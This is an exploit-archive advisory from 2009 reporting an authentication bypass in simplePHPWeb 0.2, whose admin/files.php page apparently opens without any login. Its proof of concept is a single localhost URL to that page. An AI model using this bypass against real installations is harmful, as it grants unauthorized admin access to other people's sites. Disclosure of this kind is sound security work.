id: 5599
date: 08/02/2009
title: simplePHPWeb 0.2 (files.php) Authentication Bypass Vulnerability
author: SirGod
cves: 

================================================================
simplePHPWeb 0.2 (files.php) Authentication Bypass Vulnerability
================================================================


##################################################################
[+] simplePHPWeb 0.2 Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] download : http://sourceforge.net/projects/simplephpweb/files/simplephpweb/simplephpweb-v0.2/simplephpweb-v0.2.zip/download
##################################################################

[+] Authentication Bypass Vulnerability

 - No login required to access admin panel

 - PoC

   http://127.0.0.1/[path]/admin/files.php

##################################################################



#  0day.today [2023-03-24]  #